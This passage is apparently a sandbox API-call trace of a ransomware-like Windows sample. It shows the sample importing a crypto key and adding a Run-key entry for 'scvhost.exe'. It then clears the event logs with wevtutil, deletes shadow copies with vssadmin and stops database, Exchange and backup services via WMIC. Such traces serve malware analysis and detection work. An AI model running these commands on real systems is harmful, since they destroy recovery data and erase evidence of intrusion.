(_Buf=0x607190, _Val=99, _MaxCount=0x40) returned 0x6071ac [0089.944] memchr (_Buf=0x607190, _Val=51, _MaxCount=0x40) returned 0x6071c7 [0089.944] memchr (_Buf=0x607190, _Val=56, _MaxCount=0x40) returned 0x6071cc [0089.944] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.944] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.944] memchr (_Buf=0x607190, _Val=71, _MaxCount=0x40) returned 0x607196 [0089.944] memchr (_Buf=0x607190, _Val=67, _MaxCount=0x40) returned 0x607192 [0089.944] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.944] memchr (_Buf=0x607190, _Val=54, _MaxCount=0x40) returned 0x6071ca [0089.944] memchr (_Buf=0x607190, _Val=114, _MaxCount=0x40) returned 0x6071bb [0089.944] memchr (_Buf=0x607190, _Val=90, _MaxCount=0x40) returned 0x6071a9 [0089.944] memchr (_Buf=0x607190, _Val=47, _MaxCount=0x40) returned 0x6071cf [0089.944] memchr (_Buf=0x607190, _Val=106, _MaxCount=0x40) returned 0x6071b3 [0089.944] memchr (_Buf=0x607190, _Val=68, _MaxCount=0x40) returned 0x607193 [0089.944] memchr (_Buf=0x607190, _Val=105, _MaxCount=0x40) returned 0x6071b2 [0089.944] memchr (_Buf=0x607190, _Val=50, _MaxCount=0x40) returned 0x6071c6 [0089.944] memchr (_Buf=0x607190, _Val=66, _MaxCount=0x40) returned 0x607191 [0089.944] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.944] memchr (_Buf=0x607190, _Val=112, _MaxCount=0x40) returned 0x6071b9 [0089.944] memchr (_Buf=0x607190, _Val=110, _MaxCount=0x40) returned 0x6071b7 [0089.944] memchr (_Buf=0x607190, _Val=115, _MaxCount=0x40) returned 0x6071bc [0089.944] memchr (_Buf=0x607190, _Val=90, _MaxCount=0x40) returned 0x6071a9 [0089.944] memchr (_Buf=0x607190, _Val=83, _MaxCount=0x40) returned 0x6071a2 [0089.944] memchr (_Buf=0x607190, _Val=90, _MaxCount=0x40) returned 0x6071a9 [0089.944] memchr (_Buf=0x607190, _Val=68, _MaxCount=0x40) returned 0x607193 [0089.944] memchr (_Buf=0x607190, _Val=71, _MaxCount=0x40) returned 0x607196 [0089.944] memchr (_Buf=0x607190, _Val=68, _MaxCount=0x40) returned 0x607193 [0089.944] memchr (_Buf=0x607190, _Val=81, _MaxCount=0x40) returned 0x6071a0 [0089.944] memchr (_Buf=0x607190, _Val=77, _MaxCount=0x40) returned 0x60719c [0089.945] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.945] memchr (_Buf=0x607190, _Val=43, _MaxCount=0x40) returned 0x6071ce [0089.945] memchr (_Buf=0x607190, _Val=79, _MaxCount=0x40) returned 0x60719e [0089.945] memchr (_Buf=0x607190, _Val=119, _MaxCount=0x40) returned 0x6071c0 [0089.945] memchr (_Buf=0x607190, _Val=111, _MaxCount=0x40) returned 0x6071b8 [0089.945] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.945] memchr (_Buf=0x607190, _Val=53, _MaxCount=0x40) returned 0x6071c9 [0089.945] memchr (_Buf=0x607190, _Val=68, _MaxCount=0x40) returned 0x607193 [0089.945] memchr (_Buf=0x607190, _Val=121, _MaxCount=0x40) returned 0x6071c2 [0089.945] memchr (_Buf=0x607190, _Val=101, _MaxCount=0x40) returned 0x6071ae [0089.945] memchr (_Buf=0x607190, _Val=80, _MaxCount=0x40) returned 0x60719f [0089.945] memchr (_Buf=0x607190, _Val=98, _MaxCount=0x40) returned 0x6071ab [0089.945] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.945] memchr (_Buf=0x607190, _Val=56, _MaxCount=0x40) returned 0x6071cc [0089.945] memchr (_Buf=0x607190, _Val=115, _MaxCount=0x40) returned 0x6071bc [0089.945] memchr (_Buf=0x607190, _Val=114, _MaxCount=0x40) returned 0x6071bb [0089.945] memchr (_Buf=0x607190, _Val=115, _MaxCount=0x40) returned 0x6071bc [0089.945] memchr (_Buf=0x607190, _Val=57, _MaxCount=0x40) returned 0x6071cd [0089.945] memchr (_Buf=0x607190, _Val=118, _MaxCount=0x40) returned 0x6071bf [0089.945] memchr (_Buf=0x607190, _Val=112, _MaxCount=0x40) returned 0x6071b9 [0089.945] memchr (_Buf=0x607190, _Val=100, _MaxCount=0x40) returned 0x6071ad [0089.945] memchr (_Buf=0x607190, _Val=53, _MaxCount=0x40) returned 0x6071c9 [0089.945] memchr (_Buf=0x607190, _Val=69, _MaxCount=0x40) returned 0x607194 [0089.945] memchr (_Buf=0x607190, _Val=112, _MaxCount=0x40) returned 0x6071b9 [0089.945] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.945] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.945] memchr (_Buf=0x607190, _Val=71, _MaxCount=0x40) returned 0x607196 [0089.945] memchr (_Buf=0x607190, _Val=47, _MaxCount=0x40) returned 0x6071cf [0089.946] memchr (_Buf=0x607190, _Val=67, _MaxCount=0x40) returned 0x607192 [0089.946] memchr (_Buf=0x607190, _Val=102, _MaxCount=0x40) returned 0x6071af [0089.946] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.946] memchr (_Buf=0x607190, _Val=109, _MaxCount=0x40) returned 0x6071b6 [0089.946] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.946] memchr (_Buf=0x607190, _Val=107, _MaxCount=0x40) returned 0x6071b4 [0089.946] memchr (_Buf=0x607190, _Val=85, _MaxCount=0x40) returned 0x6071a4 [0089.946] memchr (_Buf=0x607190, _Val=51, _MaxCount=0x40) returned 0x6071c7 [0089.946] memchr (_Buf=0x607190, _Val=79, _MaxCount=0x40) returned 0x60719e [0089.946] memchr (_Buf=0x607190, _Val=82, _MaxCount=0x40) returned 0x6071a1 [0089.946] memchr (_Buf=0x607190, _Val=117, _MaxCount=0x40) returned 0x6071be [0089.946] memchr (_Buf=0x607190, _Val=106, _MaxCount=0x40) returned 0x6071b3 [0089.946] memchr (_Buf=0x607190, _Val=106, _MaxCount=0x40) returned 0x6071b3 [0089.946] memchr (_Buf=0x607190, _Val=78, _MaxCount=0x40) returned 0x60719d [0089.946] memchr (_Buf=0x607190, _Val=120, _MaxCount=0x40) returned 0x6071c1 [0089.946] memchr (_Buf=0x607190, _Val=53, _MaxCount=0x40) returned 0x6071c9 [0089.946] memchr (_Buf=0x607190, _Val=103, _MaxCount=0x40) returned 0x6071b0 [0089.946] memchr (_Buf=0x607190, _Val=70, _MaxCount=0x40) returned 0x607195 [0089.946] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.946] memchr (_Buf=0x607190, _Val=110, _MaxCount=0x40) returned 0x6071b7 [0089.946] memchr (_Buf=0x607190, _Val=76, _MaxCount=0x40) returned 0x60719b [0089.946] memchr (_Buf=0x607190, _Val=121, _MaxCount=0x40) returned 0x6071c2 [0089.946] memchr (_Buf=0x607190, _Val=101, _MaxCount=0x40) returned 0x6071ae [0089.946] memchr (_Buf=0x607190, _Val=107, _MaxCount=0x40) returned 0x6071b4 [0089.946] memchr (_Buf=0x607190, _Val=100, _MaxCount=0x40) returned 0x6071ad [0089.946] memchr (_Buf=0x607190, _Val=48, _MaxCount=0x40) returned 0x6071c4 [0089.946] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.946] memchr (_Buf=0x607190, _Val=74, _MaxCount=0x40) returned 0x607199 [0089.947] memchr (_Buf=0x607190, _Val=120, _MaxCount=0x40) returned 0x6071c1 [0089.947] memchr (_Buf=0x607190, _Val=115, _MaxCount=0x40) returned 0x6071bc [0089.947] memchr (_Buf=0x607190, _Val=98, _MaxCount=0x40) returned 0x6071ab [0089.947] memchr (_Buf=0x607190, _Val=89, _MaxCount=0x40) returned 0x6071a8 [0089.947] memchr (_Buf=0x607190, _Val=78, _MaxCount=0x40) returned 0x60719d [0089.947] memchr (_Buf=0x607190, _Val=107, _MaxCount=0x40) returned 0x6071b4 [0089.947] memchr (_Buf=0x607190, _Val=101, _MaxCount=0x40) returned 0x6071ae [0089.947] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.947] memchr (_Buf=0x607190, _Val=89, _MaxCount=0x40) returned 0x6071a8 [0089.947] memchr (_Buf=0x607190, _Val=43, _MaxCount=0x40) returned 0x6071ce [0089.947] memchr (_Buf=0x607190, _Val=119, _MaxCount=0x40) returned 0x6071c0 [0089.947] memchr (_Buf=0x607190, _Val=53, _MaxCount=0x40) returned 0x6071c9 [0089.947] memchr (_Buf=0x607190, _Val=77, _MaxCount=0x40) returned 0x60719c [0089.947] memchr (_Buf=0x607190, _Val=87, _MaxCount=0x40) returned 0x6071a6 [0089.947] memchr (_Buf=0x607190, _Val=119, _MaxCount=0x40) returned 0x6071c0 [0089.947] memchr (_Buf=0x607190, _Val=51, _MaxCount=0x40) returned 0x6071c7 [0089.947] memchr (_Buf=0x607190, _Val=106, _MaxCount=0x40) returned 0x6071b3 [0089.947] memchr (_Buf=0x607190, _Val=111, _MaxCount=0x40) returned 0x6071b8 [0089.947] memchr (_Buf=0x607190, _Val=88, _MaxCount=0x40) returned 0x6071a7 [0089.947] memchr (_Buf=0x607190, _Val=111, _MaxCount=0x40) returned 0x6071b8 [0089.947] memchr (_Buf=0x607190, _Val=116, _MaxCount=0x40) returned 0x6071bd [0089.947] memchr (_Buf=0x607190, _Val=83, _MaxCount=0x40) returned 0x6071a2 [0089.947] memchr (_Buf=0x607190, _Val=118, _MaxCount=0x40) returned 0x6071bf [0089.947] memchr (_Buf=0x607190, _Val=76, _MaxCount=0x40) returned 0x60719b [0089.947] memchr (_Buf=0x607190, _Val=116, _MaxCount=0x40) returned 0x6071bd [0089.947] memchr (_Buf=0x607190, _Val=81, _MaxCount=0x40) returned 0x6071a0 [0089.947] memchr (_Buf=0x607190, _Val=80, _MaxCount=0x40) returned 0x60719f [0089.947] memchr (_Buf=0x607190, _Val=100, _MaxCount=0x40) returned 0x6071ad [0089.948] memchr (_Buf=0x607190, _Val=48, _MaxCount=0x40) returned 0x6071c4 [0089.948] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.948] memchr (_Buf=0x607190, _Val=43, _MaxCount=0x40) returned 0x6071ce [0089.948] memchr (_Buf=0x607190, _Val=77, _MaxCount=0x40) returned 0x60719c [0089.948] memchr (_Buf=0x607190, _Val=101, _MaxCount=0x40) returned 0x6071ae [0089.948] memchr (_Buf=0x607190, _Val=55, _MaxCount=0x40) returned 0x6071cb [0089.948] memchr (_Buf=0x607190, _Val=113, _MaxCount=0x40) returned 0x6071ba [0089.948] memchr (_Buf=0x607190, _Val=77, _MaxCount=0x40) returned 0x60719c [0089.948] CryptAcquireContextW (in: phProv=0x6074e8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x6074e8*=0x8c1fa8) returned 1 [0089.948] CryptImportKey (in: hProv=0x8c1fa8, pbData=0x2886a88, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x6074ec | out: phKey=0x6074ec*=0x8c6be8) returned 1 [0089.982] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x29fc9c | out: phkResult=0x29fc9c*=0x1ec) returned 0x0 [0089.982] RegSetValueExW (in: hKey=0x1ec, lpValueName="", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe supermetroidrules", cbData=0x78 | out: lpData="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe supermetroidrules") returned 0x0 [0089.982] GetSystemDirectoryA (in: lpBuffer=0x29fa50, uSize=0x100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.982] strlen (_Str="C:\\Windows\\system32") returned 0x13 [0089.982] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0089.982] _mbscat (in: param_1=0x29fb50, param_2=0x28821c8 | out: param_1=0x29fb50) returned 0x29fb50 [0089.983] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c wevtutil cl Application", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c wevtutil cl Application", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x774, dwThreadId=0x764)) returned 1 [0090.195] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0094.081] CloseHandle (hObject=0x1f4) returned 1 [0094.081] CloseHandle (hObject=0x1f0) returned 1 [0094.081] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0094.081] _mbscat (in: param_1=0x29fb50, param_2=0x2882268 | out: param_1=0x29fb50) returned 0x29fb50 [0094.082] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c wevtutil cl security", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c wevtutil cl security", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x168, dwThreadId=0x350)) returned 1 [0094.089] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0094.863] CloseHandle (hObject=0x1f4) returned 1 [0094.863] CloseHandle (hObject=0x1f0) returned 1 [0094.864] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0094.864] _mbscat (in: param_1=0x29fb50, param_2=0x28821e8 | out: param_1=0x29fb50) returned 0x29fb50 [0094.864] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c wevtutil cl setup", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c wevtutil cl setup", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xb58, dwThreadId=0x9cc)) returned 1 [0094.870] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0095.119] CloseHandle (hObject=0x1f4) returned 1 [0095.119] CloseHandle (hObject=0x1f0) returned 1 [0095.119] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0095.119] _mbscat (in: param_1=0x29fb50, param_2=0x28823c8 | out: param_1=0x29fb50) returned 0x29fb50 [0095.119] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c wevtutil cl system", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c wevtutil cl system", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xb2c, dwThreadId=0x6c8)) returned 1 [0095.129] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0095.491] CloseHandle (hObject=0x1f4) returned 1 [0095.492] CloseHandle (hObject=0x1f0) returned 1 [0095.492] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0095.492] _mbscat (in: param_1=0x29fb50, param_2=0x2882e38 | out: param_1=0x29fb50) returned 0x29fb50 [0095.492] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c vssadmin.exe Delete Shadows \\/All \\/Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c vssadmin.exe Delete Shadows \\/All \\/Quiet", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x764, dwThreadId=0x438)) returned 1 [0095.500] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0095.938] CloseHandle (hObject=0x1f4) returned 1 [0095.938] CloseHandle (hObject=0x1f0) returned 1 [0095.938] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0095.938] _mbscat (in: param_1=0x29fb50, param_2=0x28839d0 | out: param_1=0x29fb50) returned 0x29fb50 [0095.938] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x2d0, dwThreadId=0x778)) returned 1 [0095.944] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0103.193] CloseHandle (hObject=0x1f4) returned 1 [0103.193] CloseHandle (hObject=0x1f0) returned 1 [0103.193] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0103.193] _mbscat (in: param_1=0x29fb50, param_2=0x2883a18 | out: param_1=0x29fb50) returned 0x29fb50 [0103.193] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc2c, dwThreadId=0xc30)) returned 1 [0103.200] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0104.351] CloseHandle (hObject=0x1f4) returned 1 [0104.351] CloseHandle (hObject=0x1f0) returned 1 [0104.351] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0104.351] _mbscat (in: param_1=0x29fb50, param_2=0x2882e70 | out: param_1=0x29fb50) returned 0x29fb50 [0104.351] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc6c, dwThreadId=0xc70)) returned 1 [0104.357] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0105.322] CloseHandle (hObject=0x1f4) returned 1 [0105.322] CloseHandle (hObject=0x1f0) returned 1 [0105.322] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0105.322] _mbscat (in: param_1=0x29fb50, param_2=0x2882eb8 | out: param_1=0x29fb50) returned 0x29fb50 [0105.322] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xca8, dwThreadId=0xcac)) returned 1 [0105.329] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0106.533] CloseHandle (hObject=0x1f4) returned 1 [0106.533] CloseHandle (hObject=0x1f0) returned 1 [0106.533] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0106.533] _mbscat (in: param_1=0x29fb50, param_2=0x2882f00 | out: param_1=0x29fb50) returned 0x29fb50 [0106.533] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd10, dwThreadId=0xd14)) returned 1 [0106.541] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0107.710] CloseHandle (hObject=0x1f4) returned 1 [0107.710] CloseHandle (hObject=0x1f0) returned 1 [0107.710] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0107.710] _mbscat (in: param_1=0x29fb50, param_2=0x2883908 | out: param_1=0x29fb50) returned 0x29fb50 [0107.710] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd50, dwThreadId=0xd54)) returned 1 [0107.718] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0109.134] CloseHandle (hObject=0x1f4) returned 1 [0109.134] CloseHandle (hObject=0x1f0) returned 1 [0109.134] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0109.134] _mbscat (in: param_1=0x29fb50, param_2=0x2883958 | out: param_1=0x29fb50) returned 0x29fb50 [0109.134] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xda0, dwThreadId=0xda4)) returned 1 [0109.141] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0110.189] CloseHandle (hObject=0x1f4) returned 1 [0110.189] CloseHandle (hObject=0x1f0) returned 1 [0110.189] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0110.189] _mbscat (in: param_1=0x29fb50, param_2=0x2885390 | out: param_1=0x29fb50) returned 0x29fb50 [0110.189] CreateProcessA (in: 